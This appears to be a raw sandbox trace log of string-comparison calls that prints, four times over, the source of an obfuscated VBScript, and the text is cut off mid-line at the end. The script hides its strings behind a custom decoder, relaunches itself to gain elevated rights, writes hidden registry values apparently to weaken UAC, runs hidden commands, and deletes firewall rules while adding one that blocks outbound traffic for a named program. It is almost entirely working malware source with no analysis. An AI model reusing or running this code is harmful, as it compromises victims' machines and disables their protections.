CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -4 [0222.947] wcsncmp (_String1="\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -4 [0222.947] wcsncmp (_String1="sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.947] wcsncmp (_String1="r = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0222.947] wcsncmp (_String1=" = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.947] wcsncmp (_String1="= sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = 